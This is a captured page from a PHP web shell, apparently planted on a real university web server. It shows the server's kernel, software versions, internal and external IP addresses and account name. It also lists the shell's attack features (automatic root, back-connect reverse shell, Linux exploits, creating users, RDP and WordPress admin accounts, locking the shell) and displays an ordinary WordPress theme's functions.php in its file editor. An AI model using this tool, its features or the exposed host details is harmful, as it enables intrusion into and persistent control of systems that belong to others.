Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 18.217.56.115
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
appadmin
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
var /
www /
html /
aaou /
wp-content /
themes /
eventalk /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxrwxr-x
inc
[ DIR ]
drwxrwxr-x
languages
[ DIR ]
drwxrwxr-x
template-parts
[ DIR ]
drwxrwxr-x
templates
[ DIR ]
drwxrwxr-x
woocommerce
[ DIR ]
drwxrwxr-x
404.php
1016
B
-rw-rw-r--
comments.php
4.23
KB
-rw-rw-r--
fallback.php
915
B
-rw-rw-r--
footer.php
363
B
-rw-rw-r--
functions.php
2.32
KB
-rw-rw-r--
header.php
3.22
KB
-rw-rw-r--
index.php
1.76
KB
-rw-rw-r--
page.php
1.02
KB
-rw-rw-r--
screenshot.png
235.13
KB
-rw-rw-r--
search.php
1.08
KB
-rw-rw-r--
sidebar.php
455
B
-rw-rw-r--
single-eventalk_event.php
1.46
KB
-rw-rw-r--
single-eventalk_speaker.php
1.07
KB
-rw-rw-r--
single.php
1.02
KB
-rw-rw-r--
style-editor.css
15.59
KB
-rw-rw-r--
style.css
834
B
-rw-rw-r--
wpml-config.xml
1.75
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : functions.php
<?php /** * @author RadiusTheme * @since 1.0 * @version 1.4 */ if (!isset($content_width)) { $content_width = 1200; } class Eventalk_Main { public $theme = 'eventalk'; public $action = 'eventalk_theme_init'; public function __construct() { add_action('after_setup_theme', array($this, 'load_textdomain'), 15); if (version_compare(PHP_VERSION, '7', '>=')) { $this->includes(); } else { $this->fallback(); } } public function load_textdomain() { load_theme_textdomain($this->theme, get_template_directory() . '/languages'); } public function includes() { do_action($this->action); require_once get_template_directory() . '/inc/constants.php'; require_once get_template_directory() . '/inc/includes.php'; require_once get_template_directory() . '/inc/lc-helper.php'; require_once get_template_directory() . '/inc/lc-utility.php'; } public function fallback() { add_action('admin_notices', array($this, 'phpfail_notice')); add_action('template_include', array($this, 'fallback_template'), 99); } public function phpfail_notice() { $theme_data = wp_get_theme($this->theme); $theme_name = $theme_data->get('Name'); $msg = sprintf(esc_html__('Error: Your current PHP version is %1$s. You need at least PHP version 7+ for theme "%2$s" to work. Please ask your hosting provider to upgrade your PHP version into 7+', 'eventalk'), PHP_VERSION, $theme_name); echo '<div class="error"><p>' . $msg . '</p></div>'; } public function fallback_template($template) { $template = locate_template(array('fallback.php')); return $template; } } new Eventalk_Main; add_editor_style('style-editor.css'); define('THEME_BASE_DIR', get_template_directory() . '/'); define('THEME_INC_DIR', THEME_BASE_DIR . 'inc/'); // Widgets fallback if (!defined('EVENTALK_CORE_UPDATE_1')) { add_action('admin_notices', 'eventalk_widgets_fallback_notice'); } function eventalk_widgets_fallback_notice() { $notice = '<div class="error"><p>' . sprintf(__("Please update plugin <b><i>Eventalk Core</b></i> to the latest version otherwise some functionalities will not work properly. You can update it from <a href='%s'>here</a>", 'eventalk'), menu_page_url('eventalk-install-plugins', false)) . '</p></div>'; echo wp_kses_post($notice); }
Close